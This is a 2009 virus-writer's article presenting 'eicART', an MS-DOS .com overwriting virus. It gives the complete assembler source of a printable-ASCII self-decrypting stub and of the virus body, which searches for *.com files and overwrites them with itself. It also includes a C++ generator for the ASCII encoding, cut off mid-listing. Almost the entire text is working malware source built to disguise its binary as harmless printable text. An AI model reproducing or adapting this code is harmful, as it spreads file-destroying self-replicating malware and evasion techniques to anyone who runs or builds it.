eicART by Second Part To Hell www.spth.de.vu written in February 2009 This is a simple MS-DOS .com-file Overwriter, but with a special feature: Its whole binary representation (its "genotype", as I prefer ;) ) just consists of ASCII human-readable characters (easily created using a standard computer keyboard). These characters are: 0x21 - 0x7E. This is exactly the same feature as the EICAR test file has. Many assembler functions are defined by characters, which are not in the required set (i.e. INT, MOV, JMP, ...). Therefore the virus itself is encrypted to a special form; and decrypted by a similar way as used in EICAR test file. For encryption of the virus, I've coded a small C++ programm. This programm uses a brute force routine, to find a suitable en- and decryption. Compiling is not very trivial, as the size of the decryptor and the binary representation of the virus are coupled nonlinearly. I have not searched a minima of size (see 21 padding bytes between decryptor and virus), but estimated a appropriate value. The decrypter is quite unoptimized (as generated by my C++ programm), which would be the source of several polymorph representations. This should not be the goal of the project - I have just used randomness in one small part of the decrypter. Compiling: Use FASM for the assembler-part, and a standard c++ compiler for the c++ part (like g++). Now you can see: [The ready-for-compiling assembler code of the virus] - search for !eicART_vir_asm [The decrypted virus code] - search for !eicART_vir_dec [The c++ programm to bring files to the ASCII form] - search for !eicART_vir_cpp [The binary representation of the virus] - search for !eicART_vir_bin !eicART_vir_asm: ################################[eicART.asm]################################# org 0x100 start: pop ax ; AX=0x0000 push ax ; Stack: 0x0000 xor ax, 0x4521 ; AX=0x4521 sub ax, 0x406B ; AX=0x04B6 = offset of eicART in memory push ax ; Stack: 0x0000 0x0200 pop bx ; BX=0x0200; Stack: 0x0000; inc bx inc bx pop ax ; AX=0000; Stack: [EMPTY] push ax ; Stack: 0x0000 xor ax, 0x214a ; AX=0x214a push ax ; Stack: 0x0000 0x214a pop cx ; CX=0x214a; Stack: 0x0000 sub byte [bx], ch ; 0x3f-0x21=1e inc bx pop ax ; AX=0000; Stack: [EMPTY] push ax ; Stack: 0x0000 xor ax, 0x4a4c ; AX=0x4a4c push ax ; Stack: 0x0000 0x4a4c pop cx ; CX=0x4a4c; Stack: 0x0000 sub byte [bx], ch sub byte [bx], ch ; [BX]=8e inc bx pop ax ; AX=0000; Stack: [EMPTY] push ax ; Stack: 0x0000 xor ax, 0x2145 ; AX=0x2145 push ax ; Stack: 0x0000 0x2145 pop cx ; CX=0x2145; Stack: 0x0000 sub byte [bx], ch ; 0x3f-0x21=1e inc bx inc bx pop ax ; AX=0000; Stack: [EMPTY] push ax ; Stack: 0x0000 xor ax, 0x2177 ; AX=0x2177 push ax ; Stack: 0x0000 0x2177 pop cx ; CX=0x2177; Stack: 0x0000 sub byte [bx], ch ; 0x21-0x21=0 inc bx inc bx pop ax ; AX=0000; Stack: [EMPTY] push ax ; Stack: 0x0000 xor ax, 0x2b78 ; AX=0x2b78 push ax ; Stack: 0x0000 0x2b78 pop cx ; CX=0x2b78; Stack: 0x0000 sub byte [bx], ch ; 0x21-0x2b=f6 inc bx pop ax ; AX=0000; Stack: [EMPTY] push ax ; Stack: 0x0000 xor ax, 0x753b ; AX=0x753b push ax ; Stack: 0x0000 0x753b pop cx ; CX=0x753b; Stack: 0x0000 sub byte [bx], ch ; 0x21-0x75=ac inc bx pop ax ; AX=0000; Stack: [EMPTY] push ax ; Stack: 0x0000 xor ax, 0x4f2b ; AX=0x4f2b push ax ; Stack: 0x0000 0x4f2b pop cx ; CX=0x4f2b; Stack: 0x0000 sub byte [bx], ch sub byte [bx], ch ; [BX]=84 inc bx pop ax ; AX=0000; Stack: [EMPTY] push ax ; Stack: 0x0000 xor ax, 0x613f ; AX=0x613f push ax ; Stack: 0x0000 0x613f pop cx ; CX=0x613f; Stack: 0x0000 sub byte [bx], ch ; 0x21-0x61=c0 inc bx inc bx pop ax ; AX=0000; Stack: [EMPTY] push ax ; Stack: 0x0000 xor ax, 0x266f ; AX=0x266f push ax ; Stack: 0x0000 0x266f pop cx ; CX=0x266f; Stack: 0x0000 sub byte [bx], ch ; 0x21-0x26=fb inc bx pop ax ; AX=0000; Stack: [EMPTY] push ax ; Stack: 0x0000 xor ax, 0x7539 ; AX=0x7539 push ax ; Stack: 0x0000 0x7539 pop cx ; CX=0x7539; Stack: 0x0000 sub byte [bx], ch ; 0x21-0x75=ac inc bx pop ax ; AX=0000; Stack: [EMPTY] push ax ; Stack: 0x0000 xor ax, 0x4f62 ; AX=0x4f62 push ax ; Stack: 0x0000 0x4f62 pop cx ; CX=0x4f62; Stack: 0x0000 sub byte [bx], ch sub byte [bx], ch ; [BX]=84 inc bx pop ax ; AX=0000; Stack: [EMPTY] push ax ; Stack: 0x0000 xor ax, 0x6148 ; AX=0x6148 push ax ; Stack: 0x0000 0x6148 pop cx ; CX=0x6148; Stack: 0x0000 sub byte [bx], ch ; 0x21-0x61=c0 inc bx inc bx pop ax ; AX=0000; Stack: [EMPTY] push ax ; Stack: 0x0000 xor ax, 0x2b60 ; AX=0x2b60 push ax ; Stack: 0x0000 0x2b60 pop cx ; CX=0x2b60; Stack: 0x0000 sub byte [bx], ch ; 0x21-0x2b=f6 inc bx pop ax ; AX=0000; Stack: [EMPTY] push ax ; Stack: 0x0000 xor ax, 0x7422 ; AX=0x7422 push ax ; Stack: 0x0000 0x7422 pop cx ; CX=0x7422; Stack: 0x0000 sub byte [bx], ch ; 0x21-0x74=ad inc bx pop ax ; AX=0000; Stack: [EMPTY] push ax ; Stack: 0x0000 xor ax, 0x4f7c ; AX=0x4f7c push ax ; Stack: 0x0000 0x4f7c pop cx ; CX=0x4f7c; Stack: 0x0000 sub byte [bx], ch sub byte [bx], ch ; [BX]=83 inc bx pop ax ; AX=0000; Stack: [EMPTY] push ax ; Stack: 0x0000 xor ax, 0x2936 ; AX=0x2936 push ax ; Stack: 0x0000 0x2936 pop cx ; CX=0x2936; Stack: 0x0000 sub byte [bx], ch ; 0x21-0x29=f8 inc bx pop ax ; AX=0000; Stack: [EMPTY] push ax ; Stack: 0x0000 xor ax, 0x2172 ; AX=0x2172 push ax ; Stack: 0x0000 0x2172 pop cx ; CX=0x2172; Stack: 0x0000 sub byte [bx], ch ; 0x22-0x21=1 inc bx inc bx inc bx pop ax ; AX=0000; Stack: [EMPTY] push ax ; Stack: 0x0000 xor ax, 0x6d25 ; AX=0x6d25 push ax ; Stack: 0x0000 0x6d25 pop cx ; CX=0x6d25; Stack: 0x0000 sub byte [bx], ch ; 0x21-0x6d=b4 inc bx inc bx inc bx pop ax ; AX=0000; Stack: [EMPTY] push ax ; Stack: 0x0000 xor ax, 0x6142 ; AX=0x6142 push ax ; Stack: 0x0000 0x6142 pop cx ; CX=0x6142; Stack: 0x0000 sub byte [bx], ch ; 0x21-0x61=c0 inc bx pop ax ; AX=0000; Stack: [EMPTY] push ax ; Stack: 0x0000 xor ax, 0x4c6f ; AX=0x4c6f push ax ; Stack: 0x0000 0x4c6f pop cx ; CX=0x4c6f; Stack: 0x0000 sub byte [bx], ch sub byte [bx], ch ; [BX]=89 inc bx pop ax ; AX=0000; Stack: [EMPTY] push ax ; Stack: 0x0000 xor ax, 0x2f58 ; AX=0x2f58 push ax ; Stack: 0x0000 0x2f58 pop cx ; CX=0x2f58; Stack: 0x0000 sub byte [bx], ch ; 0x21-0x2f=f2 inc bx pop ax ; AX=0000; Stack: [EMPTY] push ax ; Stack: 0x0000 xor ax, 0x5443 ; AX=0x5443 push ax ; Stack: 0x0000 0x5443 pop cx ; CX=0x5443; Stack: 0x0000 sub byte [bx], ch ; 0x21-0x54=cd inc bx inc bx pop ax ; AX=0000; Stack: [EMPTY] push ax ; Stack: 0x0000 xor ax, 0x4751 ; AX=0x4751 push ax ; Stack: 0x0000 0x4751 pop cx ; CX=0x4751; Stack: 0x0000 sub byte [bx], ch sub byte [bx], ch ; [BX]=93 inc bx pop ax ; AX=0000; Stack: [EMPTY] push ax ; Stack: 0x0000 xor ax, 0x215c ; AX=0x215c push ax ; Stack: 0x0000 0x215c pop cx ; CX=0x215c; Stack: 0x0000 sub byte [bx], ch ; 0x40-0x21=1f inc bx pop ax ; AX=0000; Stack: [EMPTY] push ax ; Stack: 0x0000 xor ax, 0x6d2b ; AX=0x6d2b push ax ; Stack: 0x0000 0x6d2b pop cx ; CX=0x6d2b; Stack: 0x0000 sub byte [bx], ch ; 0x21-0x6d=b4 inc bx inc bx pop ax ; AX=0000; Stack: [EMPTY] push ax ; Stack: 0x0000 xor ax, 0x6865 ; AX=0x6865 push ax ; Stack: 0x0000 0x6865 pop cx ; CX=0x6865; Stack: 0x0000 sub byte [bx], ch ; 0x21-0x68=b9 inc bx inc bx pop ax ; AX=0000; Stack: [EMPTY] push ax ; Stack: 0x0000 xor ax, 0x2140 ; AX=0x2140 push ax ; Stack: 0x0000 0x2140 pop cx ; CX=0x2140; Stack: 0x0000 sub byte [bx], ch ; 0x25-0x21=4 inc bx pop ax ; AX=0000; Stack: [EMPTY] push ax ; Stack: 0x0000 xor ax, 0x672b ; AX=0x672b push ax ; Stack: 0x0000 0x672b pop cx ; CX=0x672b; Stack: 0x0000 sub byte [bx], ch ; 0x21-0x67=ba inc bx pop ax ; AX=0000; Stack: [EMPTY] push ax ; Stack: 0x0000 xor ax, 0x2269 ; AX=0x2269 push ax ; Stack: 0x0000 0x2269 pop cx ; CX=0x2269; Stack: 0x0000 sub byte [bx], ch ; 0x21-0x22=ff inc bx pop ax ; AX=0000; Stack: [EMPTY] push ax ; Stack: 0x0000 xor ax, 0x215e ; AX=0x215e push ax ; Stack: 0x0000 0x215e pop cx ; CX=0x215e; Stack: 0x0000 sub byte [bx], ch ; 0x29-0x21=8 inc bx pop ax ; AX=0000; Stack: [EMPTY] push ax ; Stack: 0x0000 xor ax, 0x547a ; AX=0x547a push ax ; Stack: 0x0000 0x547a pop cx ; CX=0x547a; Stack: 0x0000 sub byte [bx], ch ; 0x21-0x54=cd inc bx inc bx pop ax ; AX=0000; Stack: [EMPTY] push ax ; Stack: 0x0000 xor ax, 0x6d2d ; AX=0x6d2d push ax ; Stack: 0x0000 0x6d2d pop cx ; CX=0x6d2d; Stack: 0x0000 sub byte [bx], ch ; 0x21-0x6d=b4 inc bx inc bx pop ax ; AX=0000; Stack: [EMPTY] push ax ; Stack: 0x0000 xor ax, 0x542e ; AX=0x542e push ax ; Stack: 0x0000 0x542e pop cx ; CX=0x542e; Stack: 0x0000 sub byte [bx], ch ; 0x21-0x54=cd inc bx inc bx inc bx inc bx pop ax ; AX=0000; Stack: [EMPTY] push ax ; Stack: 0x0000 xor ax, 0x6d67 ; AX=0x6d67 push ax ; Stack: 0x0000 0x6d67 pop cx ; CX=0x6d67; Stack: 0x0000 sub byte [bx], ch ; 0x21-0x6d=b4 inc bx pop ax ; AX=0000; Stack: [EMPTY] push ax ; Stack: 0x0000 xor ax, 0x2174 ; AX=0x2174 push ax ; Stack: 0x0000 0x2174 pop cx ; CX=0x2174; Stack: 0x0000 sub byte [bx], ch ; 0x2a-0x21=9 inc bx pop ax ; AX=0000; Stack: [EMPTY] push ax ; Stack: 0x0000 xor ax, 0x676f ; AX=0x676f push ax ; Stack: 0x0000 0x676f pop cx ; CX=0x676f; Stack: 0x0000 sub byte [bx], ch ; 0x21-0x67=ba inc bx inc bx pop ax ; AX=0000; Stack: [EMPTY] push ax ; Stack: 0x0000 xor ax, 0x2126 ; AX=0x2126 push ax ; Stack: 0x0000 0x2126 pop cx ; CX=0x2126; Stack: 0x0000 sub byte [bx], ch ; 0x26-0x21=5 inc bx pop ax ; AX=0000; Stack: [EMPTY] push ax ; Stack: 0x0000 xor ax, 0x546a ; AX=0x546a push ax ; Stack: 0x0000 0x546a pop cx ; CX=0x546a; Stack: 0x0000 sub byte [bx], ch ; 0x21-0x54=cd inc bx inc bx pop ax ; AX=0000; Stack: [EMPTY] push ax ; Stack: 0x0000 xor ax, 0x6d36 ; AX=0x6d36 push ax ; Stack: 0x0000 0x6d36 pop cx ; CX=0x6d36; Stack: 0x0000 sub byte [bx], ch ; 0x21-0x6d=b4 inc bx inc bx inc bx pop ax ; AX=0000; Stack: [EMPTY] push ax ; Stack: 0x0000 xor ax, 0x6139 ; AX=0x6139 push ax ; Stack: 0x0000 0x6139 pop cx ; CX=0x6139; Stack: 0x0000 sub byte [bx], ch ; 0x21-0x61=c0 inc bx pop ax ; AX=0000; Stack: [EMPTY] push ax ; Stack: 0x0000 xor ax, 0x6842 ; AX=0x6842 push ax ; Stack: 0x0000 0x6842 pop cx ; CX=0x6842; Stack: 0x0000 sub byte [bx], ch ; 0x21-0x68=b9 inc bx pop ax ; AX=0000; Stack: [EMPTY] push ax ; Stack: 0x0000 xor ax, 0x213e ; AX=0x213e push ax ; Stack: 0x0000 0x213e pop cx ; CX=0x213e; Stack: 0x0000 sub byte [bx], ch ; 0x28-0x21=7 inc bx pop ax ; AX=0000; Stack: [EMPTY] push ax ; Stack: 0x0000 xor ax, 0x2135 ; AX=0x2135 push ax ; Stack: 0x0000 0x2135 pop cx ; CX=0x2135; Stack: 0x0000 sub byte [bx], ch ; 0x21-0x21=0 inc bx pop ax ; AX=0000; Stack: [EMPTY] push ax ; Stack: 0x0000 xor ax, 0x6762 ; AX=0x6762 push ax ; Stack: 0x0000 0x6762 pop cx ; CX=0x6762; Stack: 0x0000 sub byte [bx], ch ; 0x21-0x67=ba inc bx pop ax ; AX=0000; Stack: [EMPTY] push ax ; Stack: 0x0000 xor ax, 0x2122 ; AX=0x2122 push ax ; Stack: 0x0000 0x2122 pop cx ; CX=0x2122; Stack: 0x0000 sub byte [bx], ch ; 0x3d-0x21=1c inc bx pop ax ; AX=0000; Stack: [EMPTY] push ax ; Stack: 0x0000 xor ax, 0x215b ; AX=0x215b push ax ; Stack: 0x0000 0x215b pop cx ; CX=0x215b; Stack: 0x0000 sub byte [bx], ch ; 0x26-0x21=5 inc bx pop ax ; AX=0000; Stack: [EMPTY] push ax ; Stack: 0x0000 xor ax, 0x5428 ; AX=0x5428 push ax ; Stack: 0x0000 0x5428 pop cx ; CX=0x5428; Stack: 0x0000 sub byte [bx], ch ; 0x21-0x54=cd inc bx inc bx inc bx pop ax ; AX=0000; Stack: [EMPTY] push ax ; Stack: 0x0000 xor ax, 0x2124 ; AX=0x2124 push ax ; Stack: 0x0000 0x2124 pop cx ; CX=0x2124; Stack: 0x0000 sub byte [bx], ch ; 0x3d-0x21=1c inc bx pop ax ; AX=0000; Stack: [EMPTY] push ax ; Stack: 0x0000 xor ax, 0x6956 ; AX=0x6956 push ax ; Stack: 0x0000 0x6956 pop cx ; CX=0x6956; Stack: 0x0000 sub byte [bx], ch ; 0x21-0x69=b8 inc bx pop ax ; AX=0000; Stack: [EMPTY] push ax ; Stack: 0x0000 xor ax, 0x2127 ; AX=0x2127 push ax ; Stack: 0x0000 0x2127 pop cx ; CX=0x2127; Stack: 0x0000 sub byte [bx], ch ; 0x23-0x21=2 inc bx inc bx pop ax ; AX=0000; Stack: [EMPTY] push ax ; Stack: 0x0000 xor ax, 0x676a ; AX=0x676a push ax ; Stack: 0x0000 0x676a pop cx ; CX=0x676a; Stack: 0x0000 sub byte [bx], ch ; 0x21-0x67=ba inc bx pop ax ; AX=0000; Stack: [EMPTY] push ax ; Stack: 0x0000 xor ax, 0x4229 ; AX=0x4229 push ax ; Stack: 0x0000 0x4229 pop cx ; CX=0x4229; Stack: 0x0000 sub byte [bx], ch sub byte [bx], ch ; [BX]=9e inc bx pop ax ; AX=0000; Stack: [EMPTY] push ax ; Stack: 0x0000 xor ax, 0x214d ; AX=0x214d push ax ; Stack: 0x0000 0x214d pop cx ; CX=0x214d; Stack: 0x0000 sub byte [bx], ch ; 0x21-0x21=0 inc bx pop ax ; AX=0000; Stack: [EMPTY] push ax ; Stack: 0x0000 xor ax, 0x544e ; AX=0x544e push ax ; Stack: 0x0000 0x544e pop cx ; CX=0x544e; Stack: 0x0000 sub byte [bx], ch ; 0x21-0x54=cd inc bx inc bx pop ax ; AX=0000; Stack: [EMPTY] push ax ; Stack: 0x0000 xor ax, 0x4c30 ; AX=0x4c30 push ax ; Stack: 0x0000 0x4c30 pop cx ; CX=0x4c30; Stack: 0x0000 sub byte [bx], ch sub byte [bx], ch ; [BX]=89 inc bx pop ax ; AX=0000; Stack: [EMPTY] push ax ; Stack: 0x0000 xor ax, 0x5e6c ; AX=0x5e6c push ax ; Stack: 0x0000 0x5e6c pop cx ; CX=0x5e6c; Stack: 0x0000 sub byte [bx], ch ; 0x21-0x5e=c3 inc bx pop ax ; AX=0000; Stack: [EMPTY] push ax ; Stack: 0x0000 xor ax, 0x6d6c ; AX=0x6d6c push ax ; Stack: 0x0000 0x6d6c pop cx ; CX=0x6d6c; Stack: 0x0000 sub byte [bx], ch ; 0x21-0x6d=b4 inc bx inc bx pop ax ; AX=0000; Stack: [EMPTY] push ax ; Stack: 0x0000 xor ax, 0x685c ; AX=0x685c push ax ; Stack: 0x0000 0x685c pop cx ; CX=0x685c; Stack: 0x0000 sub byte [bx], ch ; 0x21-0x68=b9 inc bx inc bx pop ax ; AX=0000; Stack: [EMPTY] push ax ; Stack: 0x0000 xor ax, 0x2172 ; AX=0x2172 push ax ; Stack: 0x0000 0x2172 pop cx ; CX=0x2172; Stack: 0x0000 sub byte [bx], ch ; 0x25-0x21=4 inc bx pop ax ; AX=0000; Stack: [EMPTY] push ax ; Stack: 0x0000 xor ax, 0x673b ; AX=0x673b push ax ; Stack: 0x0000 0x673b pop cx ; CX=0x673b; Stack: 0x0000 sub byte [bx], ch ; 0x21-0x67=ba inc bx pop ax ; AX=0000; Stack: [EMPTY] push ax ; Stack: 0x0000 xor ax, 0x2223 ; AX=0x2223 push ax ; Stack: 0x0000 0x2223 pop cx ; CX=0x2223; Stack: 0x0000 sub byte [bx], ch ; 0x21-0x22=ff inc bx pop ax ; AX=0000; Stack: [EMPTY] push ax ; Stack: 0x0000 xor ax, 0x213c ; AX=0x213c push ax ; Stack: 0x0000 0x213c pop cx ; CX=0x213c; Stack: 0x0000 sub byte [bx], ch ; 0x29-0x21=8 inc bx pop ax ; AX=0000; Stack: [EMPTY] push ax ; Stack: 0x0000 xor ax, 0x5427 ; AX=0x5427 push ax ; Stack: 0x0000 0x5427 pop cx ; CX=0x5427; Stack: 0x0000 sub byte [bx], ch ; 0x21-0x54=cd inc bx inc bx pop ax ; AX=0000; Stack: [EMPTY] push ax ; Stack: 0x0000 xor ax, 0x6d59 ; AX=0x6d59 push ax ; Stack: 0x0000 0x6d59 pop cx ; CX=0x6d59; Stack: 0x0000 sub byte [bx], ch ; 0x21-0x6d=b4 inc bx inc bx pop ax ; AX=0000; Stack: [EMPTY] push ax ; Stack: 0x0000 xor ax, 0x5427 ; AX=0x5427 push ax ; Stack: 0x0000 0x5427 pop cx ; CX=0x5427; Stack: 0x0000 sub byte [bx], ch ; 0x21-0x54=cd inc bx inc bx pop ax ; AX=0000; Stack: [EMPTY] push ax ; Stack: 0x0000 xor ax, 0x6d3b ; AX=0x6d3b push ax ; Stack: 0x0000 0x6d3b pop cx ; CX=0x6d3b; Stack: 0x0000 sub byte [bx], ch ; 0x21-0x6d=b4 inc bx inc bx pop ax ; AX=0000; Stack: [EMPTY] push ax ; Stack: 0x0000 xor ax, 0x3631 ; AX=0x3631 push ax ; Stack: 0x0000 0x3631 pop cx ; CX=0x3631; Stack: 0x0000 sub byte [bx], ch ; 0x21-0x36=eb inc bx pop ax ; AX=0000; Stack: [EMPTY] push ax ; Stack: 0x0000 xor ax, 0x412d ; AX=0x412d push ax ; Stack: 0x0000 0x412d pop cx ; CX=0x412d; Stack: 0x0000 sub byte [bx], ch ; 0x21-0x41=e0 inc bx pop ax ; AX=0000; Stack: [EMPTY] push ax ; Stack: 0x0000 xor ax, 0x5479 ; AX=0x5479 push ax ; Stack: 0x0000 0x5479 pop cx ; CX=0x5479; Stack: 0x0000 sub byte [bx], ch ; 0x21-0x54=cd inc bx pop ax ; AX=0000; Stack: [EMPTY] push ax ; Stack: 0x0000 xor ax, 0x2179 ; AX=0x2179 push ax ; Stack: 0x0000 0x2179 pop cx ; CX=0x2179; Stack: 0x0000 sub byte [bx], ch ; 0x41-0x21=20 inc bx inc bx inc bx inc bx inc bx inc bx pop ax ; AX=0000; Stack: [EMPTY] push ax ; Stack: 0x0000 xor ax, 0x217d ; AX=0x217d push ax ; Stack: 0x0000 0x217d pop cx ; CX=0x217d; Stack: 0x0000 sub byte [bx], ch ; 0x21-0x21=0 inc bx pop ax ; AX=0000; Stack: [EMPTY] push ax ; Stack: 0x0000 xor ax, 0x2138 ; AX=0x2138 push ax ; Stack: 0x0000 0x2138 pop cx ; CX=0x2138; Stack: 0x0000 sub byte [bx], ch ; 0x2e-0x21=d inc bx pop ax ; AX=0000; Stack: [EMPTY] push ax ; Stack: 0x0000 xor ax, 0x2125 ; AX=0x2125 push ax ; Stack: 0x0000 0x2125 pop cx ; CX=0x2125; Stack: 0x0000 sub byte [bx], ch ; 0x2b-0x21=a inc bx pop ax ; AX=0000; Stack: [EMPTY] push ax ; Stack: 0x0000 xor ax, 0x2158 ; AX=0x2158 push ax ; Stack: 0x0000 0x2158 pop cx ; CX=0x2158; Stack: 0x0000 sub byte [bx], ch ; 0x41-0x21=20 inc bx pop ax ; AX=0000; Stack: [EMPTY] push ax ; Stack: 0x0000 xor ax, 0x2139 ; AX=0x2139 push ax ; Stack: 0x0000 0x2139 pop cx ; CX=0x2139; Stack: 0x0000 sub byte [bx], ch ; 0x41-0x21=20 inc bx inc bx inc bx inc bx inc bx inc bx pop ax ; AX=0000; Stack: [EMPTY] push ax ; Stack: 0x0000 xor ax, 0x213d ; AX=0x213d push ax ; Stack: 0x0000 0x213d pop cx ; CX=0x213d; Stack: 0x0000 sub byte [bx], ch ; 0x41-0x21=20 inc bx inc bx inc bx inc bx inc bx pop ax ; AX=0000; Stack: [EMPTY] push ax ; Stack: 0x0000 xor ax, 0x215d ; AX=0x215d push ax ; Stack: 0x0000 0x215d pop cx ; CX=0x215d; Stack: 0x0000 sub byte [bx], ch ; 0x41-0x21=20 inc bx inc bx inc bx inc bx inc bx inc bx inc bx pop ax ; AX=0000; Stack: [EMPTY] push ax ; Stack: 0x0000 xor ax, 0x2172 ; AX=0x2172 push ax ; Stack: 0x0000 0x2172 pop cx ; CX=0x2172; Stack: 0x0000 sub byte [bx], ch ; 0x2e-0x21=d inc bx pop ax ; AX=0000; Stack: [EMPTY] push ax ; Stack: 0x0000 xor ax, 0x2150 ; AX=0x2150 push ax ; Stack: 0x0000 0x2150 pop cx ; CX=0x2150; Stack: 0x0000 sub byte [bx], ch ; 0x2b-0x21=a inc bx pop ax ; AX=0000; Stack: [EMPTY] push ax ; Stack: 0x0000 xor ax, 0x2167 ; AX=0x2167 push ax ; Stack: 0x0000 0x2167 pop cx ; CX=0x2167; Stack: 0x0000 sub byte [bx], ch ; 0x2e-0x21=d inc bx pop ax ; AX=0000; Stack: [EMPTY] push ax ; Stack: 0x0000 xor ax, 0x216e ; AX=0x216e push ax ; Stack: 0x0000 0x216e pop cx ; CX=0x216e; Stack: 0x0000 sub byte [bx], ch ; 0x2b-0x21=a inc bx inc bx inc bx inc bx pop ax ; AX=0000; Stack: [EMPTY] push ax ; Stack: 0x0000 xor ax, 0x213c ; AX=0x213c push ax ; Stack: 0x0000 0x213c pop cx ; CX=0x213c; Stack: 0x0000 sub byte [bx], ch ; 0x41-0x21=20 inc bx inc bx inc bx inc bx inc bx inc bx inc bx inc bx pop ax ; AX=0000; Stack: [EMPTY] push ax ; Stack: 0x0000 xor ax, 0x2135 ; AX=0x2135 push ax ; Stack: 0x0000 0x2135 pop cx ; CX=0x2135; Stack: 0x0000 sub byte [bx], ch ; 0x2e-0x21=d inc bx pop ax ; AX=0000; Stack: [EMPTY] push ax ; Stack: 0x0000 xor ax, 0x213b ; AX=0x213b push ax ; Stack: 0x0000 0x213b pop cx ; CX=0x213b; Stack: 0x0000 sub byte [bx], ch ; 0x2b-0x21=a inc bx inc bx ; 21 padding byte times 21: inc bx eicART: db 102d, 96d, 63d, 34d, 63d, 44d, 33d, 49d db 33d, 33d, 34d, 33d, 117d, 33d, 33d, 34d db 33d, 117d, 33d, 33d, 33d, 33d, 34d, 114d db 75d, 33d, 61d, 48d, 33d, 33d, 33d, 33d db 33d, 33d, 64d, 33d, 63d, 33d, 73d, 37d db 33d, 33d, 41d, 33d, 33d, 33d, 62d, 33d db 33d, 102d, 97d, 33d, 42d, 33d, 34d, 38d db 33d, 33d, 33d, 78d, 48d, 33d, 33d, 40d db 33d, 33d, 61d, 38d, 33d, 33d, 114d, 61d db 33d, 35d, 61d, 33d, 34d, 33d, 33d, 33d db 33d, 33d, 33d, 64d, 33d, 73d, 37d, 33d db 33d, 41d, 33d, 33d, 33d, 62d, 33d, 33d db 33d, 79d, 33d, 33d, 33d, 65d, 42d, 46d db 99d, 111d, 109d, 33d, 46d, 43d, 65d, 65d db 76d, 39d, 97d, 114d, 116d, 65d, 112d, 111d db 117d, 114d, 65d, 108d, 39d, 97d, 114d, 116d db 33d, 46d, 43d, 46d, 43d, 46d, 46d, 46d db 65d, 101d, 105d, 99d, 65d, 82d, 84d, 33d db 46d, 43d, 36d ################################[eicART.asm]################################# !eicART_vir_dec: ################################[eicVIR.asm]################################# DecrypterLen EQU 950d VirusLength EQU 147d + DecrypterLen StartOffset EQU 0x100 + DecrypterLen org StartOffset use16 Start: ; The Virus gets its code by opening its own ; file and copy the code. It can not use the ; code directly at 0x100, because the virus ; will be undecrypted, and the undecrypted ; version would be spreaded. pushad ; Save all registers push ds ; Save Data Segment mov ds, [ds:2Ch] ; for .com program CS=DS=PSP segment xor si, si ; DS:SI points to environment variables Skip_Value: ; After all environment variables, the program's filename is. lodsb ; AL=DS:SI test al, al ; 0x0? jnz Skip_Value ; No, skip value lodsb ; 2nd 0x0? test al, al ; End of Environment? jnz Skip_Value lodsw ; Load amount of additional strings cmp ax, 0x1 jb End_Virus mov ah, 0x3D ; Open file xor al, al ; for reading mov dx, si ; Filename int 0x21 xchg ax, bx ; Filepointer to bx pop ds ; Data Segment gets its standard value again mov ah, 0x3F ; Read from file mov cx, VirusLength ; Read the whole virus mov dx, Start_Buffer+DecrypterLen ; At the end of the file int 0x21 mov ah, 0x3E ; Close File int 0x21 ; Execute it! popad ; Restore all registers mov ah, 0x09 mov dx, Messenge int 0x21 mov ah, 0x4E ; Find First File xor al, al mov cx, 0x7 ; File Attribute mov dx, SearchPattern ; Pointer to the search-pattern Infection_Loop: int 0x21 ; Execute it! jc End_Virus mov ax, 0x3D02 ; Open File for Writing mov dx, 0x9E ; DTA int 0x21 ; Execute it! mov bx, ax ; Filehandle to BX mov ah, 0x40 ; Write to file mov cx, VirusLength ; How much to write: Viruslength mov dx, StartOffset+VirusLength ; What to write: Virus (see 'org ...') int 0x21 ; Execute it! mov ah, 0x3E ; Close File int 0x21 ; Execute it! mov ah, 0x4F ; Find Next File jmp Infection_Loop End_Virus: nomsg: int 0x20 SearchPattern db '*.com', 0x0 Messenge db 13,10 db " L'art pour l'art!" db 13,10, 13, 10 db "... eicART!" db 13,10,"$" Start_Buffer: ################################[eicVIR.asm]################################# !eicART_vir_cpp: ################################[ASCIIgen.cpp]################################# #include #include #include #include using namespace std; class information { public: int typ; // typ=0: IsPartOf(c)==TRUE // typ=1: c=n-p // typ=2: c=n-p-p unsigned char n; unsigned char q; information() { typ=3; n=0; q=0; } }; bool IsPartOf(unsigned char x) { bool res=false; if (x>=33 && x<=126) { res=true; } return(res); } information MakeSpecialKey(unsigned char c) { // Returns n=0 || n>=33 && n<=126 // If n=0: The given integer c is already n>=33 && n<=126 // Else: c=n-q, with n and q part of printable ASCIIs information data; unsigned char n=0; unsigned char q, dif, m, p; if (IsPartOf(c)) { data.typ=0; } else { n=33; q=33; m=33; p=33; dif=n-q; while(dif!=c) { if (n==126 && q==126) { // Double Subtraction if (m==126 && p==126) { cout << "Strange number: " <<(int)c << endl; system("PAUSE"); } if (m==126 && p<126) { m=32; p++; dif=m-p-p; } if (m<126) { m++; dif=m-p-p; } } if (n==126 && q<126) { n=32; q++; dif=n-q;} if (n<126) { n++; dif=n-q;} } if (n==126 && q==126) { data.typ=2; data.n=m; data.q=p; } else { data.typ=1; data.n=n; data.q=q; } } return(data); } int main(int argc, char *argv[]) { unsigned char c; string EncData; information msk; int OutSize; ofstream OutFile, EncD; EncD.open("EncData.inc"); OutFile.open("eicART.asm"); ifstream FileSize("c.bin",ios::binary); if (!FileSize.is_open()) { cout << "File open error!" << endl; system("PAUSE"); return(-1); } OutSize=10; // Start of Decryptor c=FileSize.get(); while(!FileSize.eof()) { msk=MakeSpecialKey(c); if (msk.typ==0) { OutSize++; } if (msk.typ==1) { OutSize+=10; } if (msk.typ==2) { OutSize+=12; } c=FileSize.get(); } FileSize.close(); ifstream InFile("c.bin",ios::binary); OutFile << "org 0x100" << endl << hex; OutFile << "start:" << endl << endl; OutFile << "pop ax ; AX=0x0000" << endl; OutFile << "push ax ; Stack: 0x0000" << endl; OutFile << "; You have to change AX to eicART+0x100 within exactly (!) 4 byte" << endl; OutFile << "; Use XOR, AND, SUB, INC, DEC for example" << endl; OutFile << "push ax ; Stack: 0x0000 0x0200" << endl; OutFile << "pop bx ; BX=0x0200; Stack: 0x0000;" << endl << endl; c=InFile.get(); while(!InFile.eof()) { msk=MakeSpecialKey(c); if (msk.typ==0) { OutFile << "inc bx" << endl; EncD << "db " << (int)c << "d" << endl; } if (msk.typ==1) { // c=n-q int rnd=rand() % 94 + 33; OutFile << "pop ax ; AX=0000; Stack: [EMPTY]" << endl; OutFile << "push ax ; Stack: 0x0000" << endl; OutFile << "xor ax, 0x" << (int)msk.q << rnd << " ; AX=0x" << (int)msk.q << rnd << endl; OutFile << "push ax ; Stack: 0x0000 0x" << (int)msk.q << rnd << endl; OutFile << "pop cx ; CX=0x" << (int)msk.q << rnd <<"; Stack: 0x0000" << endl; 